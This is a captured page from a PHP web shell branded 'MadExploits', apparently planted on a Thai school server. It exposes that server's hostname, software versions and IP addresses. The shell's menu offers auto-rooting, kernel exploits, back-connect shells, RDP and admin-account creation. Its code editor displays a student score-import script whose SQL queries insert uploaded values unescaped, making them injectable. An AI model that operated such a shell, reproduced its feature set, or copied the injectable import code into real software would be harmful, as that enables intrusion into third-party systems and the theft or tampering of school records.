Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
modules /
achievement /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
install
[ DIR ]
drwxr-xr-x
main
[ DIR ]
drwxr-xr-x
manual
[ DIR ]
drwxr-xr-x
upload_files
[ DIR ]
drwxrwxrwx
default.php
288
B
-rwxr-xr-x
index.php
739
B
-rwxr-xr-x
menu.php
3.5
KB
-rwxr-xr-x
menu_mobile.php
973
B
-rwxr-xr-x
read_import.php
9.3
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : read_import.php
<?php /** ensure this file is being included by a parent file */ defined( '_VALID_' ) or die( 'Direct Access to this location is not allowed.' ); $rec_date = date("Y-m-d"); $officer=$_SESSION['login_user_id']; if($_FILES){ if($_FILES['userfile']['name']==""){ ?> <script> alert("กรุณาเลือกไฟล์ด้วย ค่ะ"); document.location.href="?option=student_main&task=student_import2"; </script> <?php exit(); } // ตรวจสอบว่าเป็น text file หรือไม่ $uploaddir ="modules/student_main/upload/"; //ที่เก็บไฟล์ $uploadfile = $uploaddir.basename($_FILES['userfile']['name']); $basename = basename($_FILES['userfile']['name']); //ลบไฟล์เดิม if(file_exists($uploadfile)){ unlink($uploadfile); } $file_name = explode(".", $_FILES['userfile']['name']); //ตรวจสอบนามสกุล if($file_name[1]!="txt"){ unlink($_FILES['userfile']['tmp_name']); ?> <script> alert("ไม่ใช่ ไฟล์ประเภท Text กรุณาอ่านคำอธิบายอีกครั้ง"); document.location.href="?option=student_main&task=student_import2"; </script> <?php exit(); } if (move_uploaded_file($_FILES['userfile']['tmp_name'],$uploadfile)){ $data=file("$uploadfile"); $rec_num=0; for($i=0;$i<count($data);$i++){ list($objArr[0],$objArr[1],$objArr[2],$objArr[3],$objArr[4],$objArr[5],$objArr[6],$objArr[7],$objArr[8],$objArr[9],$objArr[10],$objArr[11],$objArr[12],$objArr[13],$objArr[14],$objArr[15],$objArr[16],$objArr[17],$objArr[18],$objArr[19],$objArr[20],$objArr[21],$objArr[22],$objArr[23],$objArr[24],$objArr[25],$objArr[26],$objArr[27],$objArr[28],$objArr[29],$objArr[30],$objArr[31],$objArr[32],$objArr[33],$objArr[34],$objArr[35],$objArr[36],$objArr[37],$objArr[38],$objArr[39],$objArr[40],$objArr[41],$objArr[42],$objArr[43],$objArr[44],$objArr[45],$objArr[46],$objArr[47],$objArr[48],$objArr[49],$objArr[50],$objArr[51],$objArr[52],$objArr[53],$objArr[54],$objArr[55],$objArr[56],$objArr[57],$objArr[58],$objArr[59],$objArr[60],$objArr[61],$objArr[62],$objArr[63],$objArr[64],$objArr[65],$objArr[66],$objArr[67],$objArr[68],$objArr[69],$objArr[70],$objArr[71],$objArr[72],$objArr[73],$objArr[74],$objArr[75],$objArr[76],$objArr[77],$objArr[78],$objArr[79],$objArr[80],$objArr[81],$objArr[82],$objArr[83],$objArr[84],$objArr[85],$objArr[86],$objArr[87],$objArr[88],$objArr[89],$objArr[90],$objArr[91],$objArr[92],$objArr[93],$objArr[94],$objArr[95],$objArr[96],$objArr[97],$objArr[98],$objArr[99],$objArr[100],$objArr[101],$objArr[102],$objArr[103],$objArr[104],$objArr[105],$objArr[106],$objArr[107],$objArr[108]) = explode("\t",$data[$i]); if($i>=0){ $sql_find = "select id from achievement_read where ed_year='$objArr[1]' and school_code='$objArr[0]' and term='$objArr[2]' "; $dbquery_find = mysqli_query($connect,$sql_find); $num_row=mysqli_num_rows($dbquery_find); if($num_row>=1){ $sql_del = "delete from achievement_read where ed_year='$objArr[1]' and school_code='$objArr[0]' and term='$objArr[2]' "; $dbquery_del = mysqli_query($connect,$sql_del); } if(($objArr[1]>=2562) and ($objArr[2]==1 or $objArr[2]==2)){ //ป1 $sql = "insert into achievement_read (school_code,ed_year,term,class_code,read_A_4,read_A_3,read_A_2,read_A_1,read_B_4,read_B_3,read_B_2,read_B_1,write_A_4,write_A_3,write_A_2,write_A_1,write_B_4,write_B_3,write_B_2,write_B_1,rec_date)"; $sql .=" values ('$objArr[0]','$objArr[1]','$objArr[2]','4','$objArr[5]','$objArr[6]','$objArr[7]','$objArr[8]','$objArr[10]','$objArr[11]','$objArr[12]','$objArr[13]','$objArr[15]','$objArr[16]','$objArr[17]','$objArr[18]','$objArr[20]','$objArr[21]','$objArr[22]','$objArr[23]','$rec_date')"; //echo $sql; echo "<br>"; $dbquery2 = mysqli_query($connect,$sql); if($dbquery2){ $rec_num=$rec_num+1; } //ป2 $sql = "insert into achievement_read (school_code,ed_year,term,class_code,read_A_4,read_A_3,read_A_2,read_A_1,read_B_4,read_B_3,read_B_2,read_B_1,write_A_4,write_A_3,write_A_2,write_A_1,write_B_4,write_B_3,write_B_2,write_B_1,rec_date)"; $sql .=" values ('$objArr[0]','$objArr[1]','$objArr[2]','5','$objArr[25]','$objArr[26]','$objArr[27]','$objArr[28]','$objArr[30]','$objArr[31]','$objArr[32]','$objArr[33]','$objArr[35]','$objArr[36]','$objArr[37]','$objArr[38]','$objArr[40]','$objArr[41]','$objArr[42]','$objArr[43]','$rec_date')"; $dbquery2 = mysqli_query($connect,$sql); if($dbquery2){ $rec_num=$rec_num+1; } //ป3 $sql = "insert into achievement_read (school_code,ed_year,term,class_code,read_A_4,read_A_3,read_A_2,read_A_1,read_B_4,read_B_3,read_B_2,read_B_1,write_A_4,write_A_3,write_A_2,write_A_1,write_B_4,write_B_3,write_B_2,write_B_1,rec_date)"; $sql .=" values ('$objArr[0]','$objArr[1]','$objArr[2]','6','$objArr[45]','$objArr[46]','$objArr[47]','$objArr[48]','$objArr[50]','$objArr[51]','$objArr[52]','$objArr[53]','$objArr[55]','$objArr[56]','$objArr[57]','$objArr[58]','$objArr[60]','$objArr[61]','$objArr[62]','$objArr[63]','$rec_date')"; $dbquery2 = mysqli_query($connect,$sql); if($dbquery2){ $rec_num=$rec_num+1; } //ป4 $sql = "insert into achievement_read (school_code,ed_year,term,class_code,read_A_4,read_A_3,read_A_2,read_A_1,read_B_4,read_B_3,read_B_2,read_B_1,write_B_4,write_B_3,write_B_2,write_B_1,rec_date)"; $sql .=" values ('$objArr[0]','$objArr[1]','$objArr[2]','7','$objArr[65]','$objArr[66]','$objArr[67]','$objArr[68]','$objArr[70]','$objArr[71]','$objArr[72]','$objArr[73]','$objArr[75]','$objArr[76]','$objArr[77]','$objArr[78]','$rec_date')"; $dbquery2 = mysqli_query($connect,$sql); if($dbquery2){ $rec_num=$rec_num+1; } //ป5 $sql = "insert into achievement_read (school_code,ed_year,term,class_code,read_A_4,read_A_3,read_A_2,read_A_1,read_B_4,read_B_3,read_B_2,read_B_1,write_B_4,write_B_3,write_B_2,write_B_1,rec_date)"; $sql .=" values ('$objArr[0]','$objArr[1]','$objArr[2]','8','$objArr[80]','$objArr[81]','$objArr[82]','$objArr[83]','$objArr[85]','$objArr[86]','$objArr[87]','$objArr[88]','$objArr[90]','$objArr[91]','$objArr[92]','$objArr[93]','$rec_date')"; $dbquery2 = mysqli_query($connect,$sql); if($dbquery2){ $rec_num=$rec_num+1; } //ป6 $sql = "insert into achievement_read (school_code,ed_year,term,class_code,read_A_4,read_A_3,read_A_2,read_A_1,read_B_4,read_B_3,read_B_2,read_B_1,write_B_4,write_B_3,write_B_2,write_B_1,rec_date)"; $sql .=" values ('$objArr[0]','$objArr[1]','$objArr[2]','9','$objArr[95]','$objArr[96]','$objArr[97]','$objArr[98]','$objArr[100]','$objArr[101]','$objArr[102]','$objArr[103]','$objArr[105]','$objArr[106]','$objArr[107]','$objArr[108]','$rec_date')"; $dbquery2 = mysqli_query($connect,$sql); if($dbquery2){ $rec_num=$rec_num+1; } } //end if(ปีการศึกษา) } //end if } // end for } // end if else{ echo "<br><strong><font color=#990000 size=3>ไม่สามารถอัพโหลดได้</font></strong>"; exit(); } ?> <script> alert("<?php echo "บันทึกข้อมูลแล้ว จำนวน $rec_num คน"; ?>"); </script> <?php } else{ uploadfile(); } //ส่วนของform function uploadfile () { echo "<form name ='frm1' Enctype = 'multipart/form-data'>"; echo "<br>"; echo "<table align='center' width='50%' border='0'>"; echo "<tr>"; echo "<td align='right'><strong><font color='#003366' size='2'>ไฟล์เอกสาร</font></strong></td>"; echo "<td align='left'><input name = 'userfile' type = 'file'><font color='#003366' size='2'></font></td>"; echo "</tr>"; echo "<tr><td></td><td></td></tr> "; echo "<tr> "; echo "<td></td><td align = 'left'><INPUT TYPE='button' name='smb' value='ตกลง' onclick='upload(1)' class='entrybutton'></td>"; echo "</tr>"; echo "</table>"; echo "</form>"; echo "<br /><br /><br />"; echo "<table width=70% border=0 align=center>"; echo "<Tr><Td align='left'><strong>คำอธิบาย</strong></Td></Tr>"; echo "<Tr><Td align='left'>1. ข้อมูลที่จะนำเข้าเป็นข้อมูลคัดกรองการอ่าน ซึ่งเป็นไฟล์ประเภท excel รูปแบบตามคู่มือ</Td></Tr>"; echo "<Tr><Td align='left'>2. Save As เป็นชนิด Text (Tab delimited)</Td></Tr>"; echo "<Tr><Td align='left'>3. เปิดไฟล์จากข้อ 2 ด้วยโปรแกรม Notepad แล้ว Save as โดยเปลี่ยน Encoding เป็น UTF-8</Td></Tr>"; echo "<Tr><Td align='left'>4. นำข้อมูลเข้าจากไฟล์ในข้อ 3</Td></Tr>"; echo "</Table>"; } ?> <script> function upload(val){ if(val==1){ callfrm("?option=achievement&task=read_import"); } } </script>
Close